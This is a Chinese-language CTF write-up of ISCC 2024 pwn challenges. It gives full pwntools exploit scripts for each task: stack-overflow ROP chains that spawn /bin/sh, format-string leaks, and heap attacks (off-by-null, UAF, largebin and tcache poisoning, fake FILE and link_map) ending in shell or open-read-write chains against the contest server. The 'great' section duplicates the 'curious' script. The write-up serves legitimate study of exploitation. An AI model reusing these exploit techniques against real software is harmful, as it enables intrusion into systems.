[ISCC 2024] pwn

记得去年的ISCC,热闹。今年的逆向啥的都不会作了,就作了点PWN,有两个是师傅给的WP。也算凑齐了。

这网站比赛结束后,居然上不去了,弄得连几个题都不清楚了。

练武题

chao

这题比较搞,在edit有可读入0x20字节可以有8字节溢出,但后边有个菜单进去直接输入Flag就进到后门了。

Your_program

输入key的时候用到危险函数gets,利用这个溢出。PIE未开,直接写ROP。

__int64 authorize()
{char v1[28]; // [rsp+0h] [rbp-20h] BYREFint v2; // [rsp+1Ch] [rbp-4h]v2 = 2;printf("Enter key: ");gets(v1);if ( v1[27] != 0x41 ){puts("failed!");exit(0);}puts("successful!");return 0LL;
}

 

from pwn import *
context(arch='amd64', log_level='debug')
elf = ELF('./Your_program')#p = process('./Your_program')
p = remote('182.92.237.102', 10032)authorize = elf.sym['authorize']
bss = 0x403a00
pop_rdi = 0x0000000000401763 # pop rdi ; ret
pop_rsi = 0x0000000000401761 # pop rsi ; pop r15 ; ret#gdb.attach(p, "b*0x4012da\nc")
p.sendlineafter(b"Enter key: ", b'A'*0x20 + flat(bss, pop_rdi, elf.got['gets'], elf.plt['puts']-4, elf.sym['authorize']))
p.recvline()
libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x83970
print(hex(libc_base))system = libc_base + 0x52290
bin_sh = libc_base + 0x1b45bd
p.sendlineafter(b"Enter key: ", b'A'*0x20 + flat(0, pop_rdi+1, pop_rdi, bin_sh, system))p.interactive()

*shopping

 n1ctf2018_null(通过劫持线程arena达到任意地址分配)

原题。

read会造成溢出,第1次不够再读会造成溢出。

size_t __fastcall sub_400BCA(__int64 a1, size_t a2)
{size_t result; // raxint v3; // [rsp+1Ch] [rbp-14h]size_t i; // [rsp+20h] [rbp-10h]for ( i = 0LL; ; i += v3 ){result = i;if ( i >= a2 )break;v3 = read(0, (void *)(a1 + i), a2);         // 分两次写实现溢出if ( v3 <= 0 ){write(1, "error\n", 6uLL);sub_400AD6(1LL);}}return result;
}

 进程中,当heap用完,再建时会建在线程数据块前,然后利用溢出将BSS的指针写到fastbin里。

from pwn import *context(arch='amd64', log_level='debug')sh = process('./p4')
#sh = remote('182.92.237.102', 10019)
#sh = remote('node3.buuoj.cn',26808)
elf = ELF('./p4')
system_plt = elf.plt['system']sh.sendlineafter(b"Enter the password: ",b"I'm ready for shopping")def add(size,n,content=b'', content2=b''):sh.sendlineafter(b"Action: ",b'1')sh.sendlineafter(b"Item ID: ",str(size).encode())sh.sendlineafter(b"Quantity: ",str(n).encode())if content == b'':sh.sendlineafter(b"Add gift message? (0/1): ",b'0')else:sh.sendlineafter(b"Add gift message? (0/1): ",b'1')sh.sendafter(b"Message: ",content)sleep(0.2)sh.send(content2)gdb.attach(sh, "b*0x400e32\nc")
'''
[+] In (0x7ffff0000000-0x7ffff3ffd000), permission=rw-0x7ffff00008b8 - 0x7ffff00008c0  →   "\x15\x40[...]" gef➤  search- 0x4015 little 0x00007fffe8000000-0x00007fffe8001000
[+] Searching '\x15\x40' in 0x00007fffe8000000-0x00007fffe8001000
[+] In (0x7fffe8000000-0x7ffff0000000), permission=rw-0x7fffe8000028 - 0x7fffe8000030  →   "\x15\x40[...]" '''
for i in range(12):add(0x4000,1000)#溢出,修改thread_arena,将bss上的fake_chunk接到fastbin里
add(0x4000,262,'0'*0x3FF0, b'1'*0x50 + p32(0) + p32(3) + 10*p64(0x60201d))payload = b'/bin/sh'.ljust(0xB,b'\x00') + p64(system_plt)
add(0x60,0,payload.ljust(0x60, b'b')) #申请到bss上,602038 修改函数指针,getshellsh.interactive()
#ISCC{63665ea3-5e5c-4109-a912-eceac236bb91}
#原文链接:https://blog.csdn.net/seaaseesa/article/details/107597557

miao

 32位程序,静态编译,gets可以溢出。

用ROP弄个chains再改改,绕过那些\n

from pwn import *
from struct import pack# Padding goes here
p = b''#p += pack('<I', 0x0806f30a) # pop edx ; ret
p += pack('<I', 0x0806f309) # pop ebx ; pop edx ; ret
p += pack('<I', 0x0) p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8666) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x08054c6b) # mov dword ptr [edx], eax ; ret
#p += pack('<I', 0x0806f30a) # pop edx ; ret
p += pack('<I', 0x0806f309) # pop ebx ; pop edx ; ret
p += pack('<I', 0x0) p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8666) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x08054c6b) # mov dword ptr [edx], eax ; ret
#p += pack('<I', 0x0806f30a) # pop edx ; ret
p += pack('<I', 0x0806f309) # pop ebx ; pop edx ; ret
p += pack('<I', 0x0) p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049573) # xor eax, eax ; ret
p += pack('<I', 0x08054c6b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080def3d) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
#p += pack('<I', 0x0806f30a) # pop edx ; ret
p += pack('<I', 0x0806f309) # pop ebx ; pop edx ; ret
p += pack('<I', 0x080ea060) p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049573) # xor eax, eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0806cf83) # int 0x80#io = process('./miao')
io = remote('182.92.237.102', 10015)
context(arch='i386', log_level='debug')#gdb.attach(io, "b*0x80489cf\nc")
#get canary
io.sendlineafter(b"Would you like to say something to it?\n", b'%31$x')
canary = int(io.recv(8), 16)io.sendlineafter(b" (  ^.^  ) \n", b'A'*100 + flat(canary,0,0,0) + p)io.interactive()

Flag

 什么年代了还32位程序。高度怀疑这些题的来历。

welcome有个printf,然后 back有个溢出

from pwn import *context(arch='i386', log_level='debug')
elf = ELF('./p3')p = remote('182.92.237.102', 10012)
#p = process('./p3')#gdb.attach(p, "b*0x8049382\nc")
p.sendlineafter(b"what's the content?\n", b'%19$p,%22$p,%27$p,')
#p.sendlineafter(b"what's the content?\n", b'%19$p,%22$p,%27$p,')p.recvuntil(b"Your answered:\n")
canary = int(p.recvuntil(b',', drop=True), 16)
rbp = int(p.recvuntil(b',', drop=True), 16)
libc = int(p.recvuntil(b',', drop=True), 16) - 0x1aed5 #0x1eed5
print(f"{libc = :x} {canary = :x} {rbp = :x}")bin_sh = libc + 0x18c363
system = libc + 0x41360#p.sendafter(b"Input:\n", b'\x00'*0x88 + flat(canary,1,0,0, elf.plt['puts'],0, elf.got['puts']))
p.sendafter(b"Input:\n", b'\x00'*0x88 + flat(canary,1,0,0, system,0, bin_sh))p.interactive()

eazy_heap

 突然这难度就上来了,libc-2.35 off_by_null 还好有模板。

造重叠块后往栈里写ORW

from pwn import *context(arch='amd64',log_level='debug')
libc = ELF('./libc.so.6') #libc-2.35-0ubuntu3
#p = process('./CAT_DE')
p = remote('182.92.237.102', 2122)def add(size, msg=b'A'):p.sendlineafter(b"input your car choice >> \n", b'1')p.sendlineafter(b"size:\n", str(size).encode())p.sendafter(b"content:\n", msg)def free(idx):p.sendlineafter(b"input your car choice >> \n", b'2')p.sendlineafter(b"idx:\n", str(idx).encode())def show(idx):p.sendlineafter(b"input your car choice >> \n", b'3')p.sendlineafter(b"idx:\n", str(idx).encode())p.recvuntil(b"context:\n")def edit(idx, msg): #off_by_nullp.sendlineafter(b"input your car choice >> \n", b'4')p.sendlineafter(b"idx:\n", str(idx).encode())p.sendafter(b"content:\n", msg)add(0x410) #A 0
add(0x120)
add(0x410) #B 2
add(0x440) #C 3 C落在尾字节为0的位置  xxxc00 x 0x450
add(0x140)
add(0x4d0) #D
add(0x410) #E 6
add(0x110)for i in [0,3,6,2]:free(i)#newB 比oldB 大0x20 oldC头部的largebin指针保留在newB尾部
add(0x430, b'\x00'*0x418+p32(0x5a0)) #0 new B = B +0x20
add(0x410) #2 E
add(0x410) #3 A
add(0x420) #6 new C = C-0x20free(3) #A
free(6) #newCadd(0x410, p64(0)+ b'\0') #3 保留第2组指针bk尾字节置0后,指向第1块保留的指针
add(0x420) #6 newCfree(6) #newC
free(2) #E
free(5) #Dadd(0x4f0, b'A'*0x4e0+b'\0') #2 newD = D+0x20
add(0x3f0) #5 newE
add(0x420) #6 newCfree(4)
add(0x148) #off_by_null newD 0x501->0x500 , pre_size=0x4a0
edit(4, b'A'*0x140+p64(0x5a0))free(2) #向前合并 C+4+D 形成重叠show(6)
libc.address = u64(p.recv(8)) - 0x21a000
print(f"{libc.address = :x}")
heap_base = u64(p.recv(16)[8:]) - 0xc20
print(f"{heap_base = :x}")pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
pop_rsi = libc.address + 0x000000000002be51 # pop rsi ; ret
pop_rdx = libc.address + 0x000000000011f497 # pop rdx ; pop r12 ; ret
pop_rcx = libc.address + 0x000000000008c6bb # pop rcx ; ret
pop_rax = libc.address + 0x0000000000045eb0 # pop rax ; ret
pop_rbp = libc.address + 0x000000000002a2e0 # pop rbp ; ret
syscall = libc.sym['getpid'] + 9
leave_ret = libc.address + 0x00000000000562ec # leave ; ret  ??
stdout = libc.sym['_IO_2_1_stdout_']add(0x88)
add(0x88)
add(0xc8)
add(0xc8)
free(2)
free(8)
edit(6, b'A'*0x68 + flat(0x91, (heap_base>>12)^(libc.sym['environ']-0x10)))
add(0x88) #2
add(0x88) #8
show(8)
stack = u64(p.recv(0x18)[0x10:]) - 0x140 - 8 free(10)
free(9)
edit(6, b'A'*0x68 + flat(0x91, b'B'*0x88, 0xd1, (heap_base>>12)^stack))
add(0xc8)
#gdb.attach(p, "b*0x5555555555dd\nc")
orw = flat([pop_rdi, stack, pop_rsi,0, pop_rax,2, syscall, #open(flag)pop_rdi,3, pop_rsi, stack+0xc0, pop_rdx,0x50,0, pop_rax, 0, syscall, #read(3,buf,0x50)pop_rdi,1, pop_rax, 1, syscall
])add(0xc8, b'/flag\0\0\0'+orw)p.interactive()

easyshell

 gets+printf先泄露地址,然后溢出写后门

from pwn import *context(arch='amd64', log_level='debug')#p = process('./p2')
p = remote('182.92.237.102', 10011)
p.sendlineafter(b'>>', b'flagis %15$p,%16$p,%17$p,')canary = int(p.recvuntil(b',', drop=True),16)
rbp = int(p.recvuntil(b',', drop=True),16)
elf = int(p.recvuntil(b',', drop=True),16)p.sendlineafter(b'>>', b'exit'.ljust(56,b'\x00') + flat(canary,rbp,elf-0x1520+0x128e))p.interactive()

U

 32位,堆题,有UAF和管理块。控制管理块

from pwn import *context(arch='i386', log_level='debug')
libc = ELF('./libc6-i386_2.31-0ubuntu9.14_amd64.so')
elf = ELF('./U')menu = b"What's your choice :"
def add(size,msg=b'A'):p.sendlineafter(menu, b'1')p.sendlineafter(b"Note size :", str(size).encode())p.sendafter(b"Content :", msg)def free(idx):p.sendlineafter(menu, b'2')p.sendlineafter(b"Index :", str(idx).encode())def show(idx):p.sendlineafter(menu, b'3')p.sendlineafter(b"Index :", str(idx).encode())#p = process('./U')
p = remote('182.92.237.102', 10016)#1, chunk2.data = chunk0.manage 修改指针泄露libc
add(0x18)
add(0x18)
free(0)
free(1)
add(8, flat(elf.sym['print_note_content'], elf.got['read']))  show(0)
libc.address = u32(p.recv(4)) - libc.sym['read']
print(f"{libc.address = :x}")#2, 将chunk0.cmd改为gets 用show实现对后边chunk1的写
free(2)
add(8, flat(libc.sym['gets']))#3,让chunk1.ptr=notelist 泄露堆地址,获得tcache的key
show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  elf.sym['print_note_content'], elf.sym['notelist'],0 , 0x21, elf.got['free']))
show(1)
heap = u32(p.recv(4)) - 0x1a0
print(f"{heap = :x}")#4,泄露栈上的指针 使用25->61->43的链修改为指向count,chunk[2],chunk[3],使count=2,清掉chunk2,3
show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], b',%8$p,%25$p,%61$p,%43$p,'))#gdb.attach(p, "b*0x804964a\nc")
show(1)
p.recvuntil(b',')
stack = int(p.recvuntil(b',', drop=True),16) - 0x88 + 0xfc
print(f"{stack = :x}")
pause()#count=2
show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%{(stack&0xffff)-4}c%25$hn,,,'.encode()))
show(1) #25, 61->43
p.recvuntil(b',,,')show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%{0xc044-4}c%61$hn,,,'.encode()))
show(1) #25, 61->43
p.recvuntil(b',,,')show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%254c%43$hhn,,,'.encode()))
show(1) #25, 61->43
p.recvuntil(b',,,')#cleak notelist 2-3
for v in range(0x50,0x58):show(0)p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%{v-4}c%61$hhn,,,'.encode()))show(1) #25, 61->43show(0)p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%252c%43$hhn,,,'.encode()))show(1) #25, 61->43p.recvuntil(b',,,')'''
0xffddbd50│+0x0000: 0x099de1d0  →  0xf7dd72b0  →  <printf+0> endbr32     ← $esp
0xffddbd54│+0x0004: 0xffddbd68  →  0xf7f70a31  →  0xe0f7ecc5
0xffddbd58│+0x0008: 0x00000004
0xffddbd5c│+0x000c: 0x080495a5  →  <print_note+16> add ebx, 0x2a5b
0xffddbd60│+0x0010: 0x0804a0e3  →  "What's your choice :"                    #4
0xffddbd64│+0x0014: 0x00000001
0xffddbd68│+0x0018: 0xf7f70a31  →  0xe0f7ecc5
0xffddbd6c│+0x001c: 0x2d45a600
0xffddbd70│+0x0020: 0xffddbd88  →  0xffdd0a33  →  0x00000000                 #8
0xffddbd74│+0x0024: 0x0804c000  →  0x0804bf0c                                #9
0xffddbd78│+0x0028: 0xffddbd98  →  0x00000000    ← $ebp
0xffddbd7c│+0x002c: 0x080497d6  →  <main+180> jmp 0x80497f5 <main+211>
0xffddbd80│+0x0030: 0x000000010xffddbdb4│+0x0064: 0xffddbe44  →  0xffddd2ea  →  0x00552f2e ("./U"?)        #25->61->43:count
0xffddbdfc│+0x00ac: 0x080491a0  →  <_start+0> endbr32                        #43
0xffddbe44│+0x00f4: 0xffddd2ea  →  0x00552f2e ("./U"?)                       #61'''#5,tcache attack 写got.free 为system ,chunk0.ptr->/bin/sh free(0)
show(0)
p.sendline(flat(libc.sym['gets'],next(libc.search(b'/bin/sh\0')),0,     0x21, b'B'*0x1c,     0x11,0,0,0,   0x21, elf.got['free'], heap+0x10))add(0x18)
add(0x18, flat(libc.sym['system'], 0x8049663)) #got.free->systemfree(0)
#gdb.attach(p)
#pause()p.interactive()#ISCC{9a7c5fbc-9d62-4edc-998a-62e8152f4df3}

ISCC_easy 

printf+溢出,没可说的了

from pwn import *context(arch='i386', log_level='debug')
libc = ELF('/home/kali/ctf/0501/libc6-i386_2.31-0ubuntu9.14_amd64.so')#p = process('./ISCC_easy')
#gdb.attach(p, "b*0x80492e3\nc")
p = remote('182.92.237.102', 10013)p.sendafter(b"Let's have fun!\n", p32(0x804c030)+b'A%4$hhn,%12$p,%15$p,')
p.recvuntil(b',')
stack = int(p.recvuntil(b',', drop=True), 16)
libc.address = int(p.recvuntil(b',', drop=True), 16) - 245 - libc.sym['__libc_start_main']
print(f"{libc.address = :x}")p.sendafter(b"Input:\n", b'A'*0x94 + flat(libc.sym['system'],0, next(libc.search(b'/bin/sh\0'))))p.interactive()

heapheap

 libc-2.31 UAF ORW

只能建大块,写link_map,模板

from pwn import *context(arch='amd64', log_level='debug')
elf = ELF("./heapheap")
libc = ELF('./libc-2.31.so')#p = process('./heapheap')
p = remote('182.92.237.102', 11000)menu = b"Your choice:\n"
def add(idx,size):p.sendlineafter(menu, b'1')p.sendlineafter(b"index:\n", str(idx).encode())p.sendlineafter(b"Size:\n", str(size).encode())def free(idx):p.sendlineafter(menu, b'4')p.sendlineafter(b"index:", str(idx).encode())def show(idx):p.sendlineafter(menu, b'2')p.sendlineafter(b"index:\n", str(idx).encode())p.recvline()def edit(idx, msg):p.sendlineafter(menu, b'3')p.sendlineafter(b"index:\n", str(idx).encode())p.sendafter(b"context: \n", msg)add(0, 0x428)
add(1, 0x500)
add(2, 0x418)free(0)
add(3, 0x500) #0 unsort->largebin
'''
0x7ffff7fc0fe0: 0x0000555555a01290      0x0000555555a01290  largebin
0x555555a012a0: 0x00007ffff7fc0fd0      0x00007ffff7fc0fd0
0x555555a012b0: 0x0000555555a01290      0x0000555555a01290 -> heap_self -> rtld_global - 0x20
'''
show(0)
large_430 = u64(p.recv(6).ljust(8, b'\x00'))
libc_base = large_430 - 0x430 - 0x30 - libc.sym['__malloc_hook']edit(0, b'A'*0x10)
show(0)
p.recv(0x10)
heap_self = u64(p.recv(6).ljust(8, b'\x00'))
heap_base = heap_self - 0x290ld_remote_off = 0
ld_remote_off = 0x6000
rtld_global = libc_base + 0x228060 - ld_remote_off 
print(f"{libc_base =:x} {large_430 =:x} {rtld_global =:x} {heap_self =:x}")free(2)
edit(0, flat(large_430,large_430, heap_self, rtld_global-0x20))
add(4, 0x500)
'''
0x7ffff7ffd060 <_rtld_global>:  0x00007ffff7ffe190      0x0000000000000004
0x7ffff7ffd060 <_rtld_global>:  0x0000555555a01bd0 -> chunk2
'''libc.address = libc_base
one = libc_base + 0xe3b04
pop_rdi = libc_base+0x23b6a
pop_rsi = libc_base+0x2601f
pop_rdx = libc_base+0x119431 #pop rdx;pop r12;ret
setcontext_3d = libc.sym['setcontext'] + 0x3d
chunk_base = heap_base + 0xbd0link_map=p64(0)
link_map+=p64(rtld_global+0x16e0)
link_map+=p64(0)
link_map+=p64(chunk_base)
link_map+=p64(0)*28 
link_map+=p64(chunk_base+0x110)
link_map+=p64(chunk_base+0x110+0x20)
link_map+=p64(chunk_base+0x110+0x10)
link_map+=p64(0x20)
link_map+=b"flag\0\0\0\0"
link_map+=p64(chunk_base)
link_map+=p64(setcontext_3d)
link_map+=p64(pop_rdi+1)  #ret 
link_map+=p64(0)*12
link_map+=p64(0)
link_map+=p64(chunk_base+0x1f8)
link_map+=p64(0)*2
link_map+=p64(0x100)
link_map+=p64(0)*2
link_map+=p64(chunk_base+0x1f8)
link_map+=p64(libc.sym['read'])  #read(0, chunk_base+0x238, 0x100)
link_map+=p64(0)*36
link_map+=p64(0x800000000)edit(2, link_map)p.sendlineafter(menu, b'5')#orw
flag_addr = chunk_base+0x130
orw = flat([pop_rdi, flag_addr, pop_rsi,0, libc.sym['open'], pop_rdi, 3, pop_rsi,heap_base+0x2a0,pop_rdx,0x50,0, libc.sym['read'],pop_rdi, 1, pop_rsi,heap_base+0x2a0,pop_rdx,0x50,0, libc.sym['write']])p.send(orw)p.interactive()

擂台题

*babyheap

先是个基于time的srand,不过ida翻译过来的不能直接用

srand(100 * ((__int64)((((__int64)0xA3D70A3D70A3D70BLL * (unsigned __int128)v0) >> 64) + v0) >> 6));

师傅的WP里是v0-v0%100,不知道为什么编译后就这么复杂了。

然后是写__stdout_FILE

from ctypes import *
from pwn import *
import timecontext(arch='amd64', log_level='debug')
elf = ELF('./babyheap')
libc = ELF('/home/kali/ctf/0501/libc.so')
clibc = cdll.LoadLibrary("/home/kali/ctf/0501/libc.so")def check1(s):v3 = [48,57,65,90,97,122]chk = ''for i in range(s):while True:v0 = clibc.rand()%6if v0&1 == 0:breakchk += chr(v3[v0] + clibc.rand()%(v3[v0+1]-v3[v0]+1))return chkdef edit(idx,msg):p.sendlineafter(b"Please Select: ", b'3')p.sendlineafter(b"Index: ", str(idx).encode())p.sendlineafter(b"Size: ", b'256')p.sendlineafter(b"Content: ", msg)def add(idx,size):p.sendlineafter(b"Please Select: ", b'1')p.sendlineafter(b"Index: ", str(idx).encode())p.sendlineafter(b"Size: ", str(size).encode())def free(idx):p.sendlineafter(b"Please Select: ", b'2')p.sendlineafter(b"Index: ", str(idx).encode())def show(idx,size):p.sendlineafter(b"Please Select: ", b'3')p.sendlineafter(b"Index: ", str(idx).encode())def gift(s):p.sendlineafter(b"Please Select: ", b'114514')p.sendlineafter(b"Please enter the captcha: ", s.encode())p = process('./babyheap')#v0 = clibc.time(0)  #返回秒数,但直接调用会报错?
#seed = (100 * (((((0xA3D70A3D70A3D70B-(1<<64)) * v0)%(1<<128) >> 64) + v0) >> 6))%(1<<32)
'''
.text:0000000000001269 89 C0                         mov     eax, eax
.text:000000000000126B 48 89 45 F8                   mov     qword ptr [rbp+seed], rax
.text:000000000000126F 48 8B 4D F8                   mov     rcx, qword ptr [rbp+seed]
.text:0000000000001273 48 BA 0B D7 A3 70 3D 0A D7 A3 mov     rdx, 0A3D70A3D70A3D70Bh
.text:000000000000127D 48 89 C8                      mov     rax, rcx
.text:0000000000001280 48 F7 EA                      imul    rdximul rdx : rax *= rdx ,rdx存的是积的符号扩展,不能用(a*b)>>64表示,要转负数
'''v0 = int(time.time())
seed = v0 - v0%100
clibc.srand(seed)s1 = check1(8)
s2 = check1(16)
s3 = check1(16)
print('ck1:', s1, s2, s3)
p.sendlineafter(b"To verify that you are AI. Enter the captcha: ", s1.encode())gdb.attach(p)
pause()gift(s2)
p.recvuntil(b"Give You: ")
libc.address = int(p.recvline(), 16) - libc.sym['printf']
print(f"{libc.address = :x}")add(0,0x20)
off = (0x9db0-0x8060)//8
'''
gef➤  x/40gx 0x0000555555558000
0x555555558000: 0x0000555555558000      0x0000000200000000
0x555555558010: 0x0000000000000000      0x0000000000000000
0x555555558020: 0x0000000000000000      0x0000000000000000
0x555555558030: 0x0000000000000000      0x0000000000000000
0x555555558040: 0x4a6b326e41453330      0x3778306b3838794e
0x555555558050: 0x0000000000000000      0x0000000000000000
0x555555558060: 0x0000555555559db0      0x0000000000000000
'''fake_IO = b'/bin/sh\x00'
fake_IO += p64(0)
fake_IO += p64(0)
fake_IO += p64(libc.sym['__stdio_close'])
fake_IO += p64(1)
fake_IO += p64(0)
fake_IO += p64(0)
fake_IO += p64(0)
fake_IO += p64(0)
fake_IO += p64(libc.sym['system'])edit(0,p64(libc.sym['__stdout_FILE']))
edit(off, fake_IO)gift(s3)  #call printf p.interactive()

curious

代码很乱,前边有个base变表检查,然后就是个溢出,看代码的难度

__int64 __fastcall sub_40200C(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, u32 a6)
{void *v6; // rdi__int64 v7; // r8u32 v8; // r9dint v9; // edxint v10; // ecxint v11; // r8dint v12; // r9dsub_419300((int *)off_4C2730, 0LL, 2, 0LL, a5, a6);v6 = off_4C2738;sub_419300((int *)off_4C2738, 0LL, 2, 0LL, v7, v8);sub_401DB5((__int64)v6, 0, v9, v10, v11, v12);if ( (unsigned int)sub_401F47(byte_4C54E0) )  // oh1yessub_419120("Go out!");elsesub_401F7E();                               // 溢出return 0LL;
}
from pwn import *context(arch='amd64', log_level='debug')#p = process('./curious')
#gdb.attach(p, "b*0x401ff3\nc")
p = remote('182.92.237.102', 10031)p.sendafter(b"Do you know what I want?", b'oh1yes') #变表b64 a-zA-Z0-9+/ B2GXEwvZ
p.sendlineafter(b"give me your name", b'A')pop_rdi = 0x0000000000401912 # pop rdi ; ret
pop_rsi = 0x000000000040f49e # pop rsi ; ret
pop_rdx = 0x000000000040181f # pop rdx ; ret
pop_rax = 0x0000000000452af7 # pop rax ; ret
syscall = 0x00000000004012d3 # syscall
bin_sh  = 0x4978b5
p.sendlineafter(b"Now what do you want to say?", b'A'*0x20+ flat(0,pop_rdi, bin_sh, pop_rsi,0,pop_rdx,0, pop_rax, 59, syscall))p.interactive()
#ISCC{nsKy2vjTBm82ZDshA5XSoEOm2IWSfc5UXDWb}

great

还是32位gets

from pwn import *context(arch='amd64', log_level='debug')#p = process('./curious')
#gdb.attach(p, "b*0x401ff3\nc")
p = remote('182.92.237.102', 10031)p.sendafter(b"Do you know what I want?", b'oh1yes') #变表b64 a-zA-Z0-9+/ B2GXEwvZ
p.sendlineafter(b"give me your name", b'A')pop_rdi = 0x0000000000401912 # pop rdi ; ret
pop_rsi = 0x000000000040f49e # pop rsi ; ret
pop_rdx = 0x000000000040181f # pop rdx ; ret
pop_rax = 0x0000000000452af7 # pop rax ; ret
syscall = 0x00000000004012d3 # syscall
bin_sh  = 0x4978b5
p.sendlineafter(b"Now what do you want to say?", b'A'*0x20+ flat(0,pop_rdi, bin_sh, pop_rsi,0,pop_rdx,0, pop_rax, 59, syscall))p.interactive()
#ISCC{nsKy2vjTBm82ZDshA5XSoEOm2IWSfc5UXDWb}

simulation_game

libc-2.35 修改mp_.tcache_max_bins 改最大tcache不是改大小是改计数,每个大0x10

largebinattack写到mp_.tcache_max_bins

然后是tcache attack写orw,不过先要读下目录,知道文件叫啥。

from pwn import *
from ctypes import *context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')
clibc = cdll.LoadLibrary("./libc.so.6")#p = process('./simulation_game')
p = remote('182.92.237.102',8888)seed = int(time.time())//10
clibc.srand(seed)
m1 = clibc.rand() % 0x10000 + 4660
m2 = clibc.rand() % 0x10000 + 87672
m3 = clibc.rand() % 0x10000 + 170684 #
m4 = clibc.rand() % 0x10000 + 253680def add(idx,size,msg=b'A'): #size  1-5 x500 520 540 560 580p.sendlineafter(b"> ", str(m1).encode())  #1startp.sendlineafter(b"> ", b'6') #save p.sendlineafter(b"> ", str(idx).encode()) #idx 0-11p.sendlineafter(b"> ", size) #size  1-5 x500 520 540 560 580p.sendafter(b"name: ", msg)p.sendlineafter(b"> ", b'7') #return 0edit = add
def free(idx, ret=b'7', free=b'1'):p.sendlineafter(b"> ", str(m2).encode())  #2loadp.sendlineafter(b"> ", str(idx).encode()) #idx 0-11p.sendlineafter(b"> ", free) #freep.sendlineafter(b"> ", ret) #return 0def load_and_save(idx1,idx2,msg): #load no free and savep.sendlineafter(b"> ", str(m2).encode())  #2loadp.sendlineafter(b"> ", str(idx1).encode()) #idx 0-11p.sendlineafter(b"> ", b'0') #freep.sendlineafter(b"> ", b'6') #save p.sendlineafter(b"> ", str(idx2).encode()) #idx 0-11p.sendlineafter(b"> ", b'1') #size  1-5 x500 520 540 560 580p.sendafter(b"name: ", msg)p.sendlineafter(b"> ", b'7') #return 0def show():p.sendlineafter(b"> ", str(m2).encode())  #2loadp.recvuntil(b'\x1bc0..........')v = p.recvuntil(b'11...')+p.recvuntil(b'\n')p.sendlineafter(b"> ", b'88')return vdef debug(idx,msg):p.sendlineafter(b"> ", str(m4).encode())  #1startp.sendlineafter(b"Choice a file for debugging.\n", str(idx).encode()) #idx 0-11p.sendafter(b"data: ", msg)####################################################################
#largebin attack 在mp_.tcache_max_bins写地址,使0x500块进tcache 
####################################################################add(0,b'2') #save
add(1,b'1')
add(2,b'1')  #4=2+0x20
free(0)
add(3,b'3')  #0 large
free(2)      #4 unsort
v = show().split(b'\n')
large500 = u64(v[0].ljust(8, b'\x00'))
libc.address = large500 - 0x21b110
print(f"{libc.address = :x}")tcache_max_bins = libc.sym['obstack_exit_failure'] - 0x20 #mp_.tcache_max_bins
print(f"{tcache_max_bins = :x}")edit(0, b'1', flat(large500,large500,0, tcache_max_bins-0x20))
add(4,b'3')  #largebin attack 0x100000=chunk4-0x10####################################################################
#tcache attack 写orw到栈
####################################################################free(3)
free(4)v = show().split(b'\n')
heap = u64(v[3][11:].ljust(8, b'\x00'))<<12
edit(4, b'3', p64(0x100050^(heap>>12)))
add(5,b'3')
add(6,b'3', flat(0x100100, libc.sym['_environ'], 0x100000)) #
show()
v = show().split(b'\n')
stack = u64(v[9][11:].ljust(8, b'\x00')) - 0x150
print('vuln ret:', hex(stack))#gdb.attach(p, "b*0x55555555635a\nc")load_and_save(8,10, flat(1,0, stack, 0x100050)) #从8中读入全0的参数写入0x100000避免参数进入指针区,并置s,chunk0#gdb.attach(p, "b*0x555555556488\nc")pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
pop_rsi = libc.address + 0x000000000002be51 # pop rsi ; ret
pop_rdx = libc.address + 0x00000000000904a9 # pop rdx ; pop rbx ; ret
pop_rax = libc.address + 0x0000000000045eb0 # pop rax ; ret
syscall = next(libc.search(asm('syscall;ret')))orw = flat([pop_rdi, stack+0xc8, pop_rsi,0, pop_rdx,0,0, pop_rax,2, syscall,  # openpop_rdi, 3, pop_rsi, 0x100080, pop_rdx,0x80,0, pop_rax,0, syscall,  # readpop_rdi, 1, pop_rax,1, syscall # write
]) + b'flllll1ll1lllla4444444444444444gGggGG\x00'#找不到文件,读目录
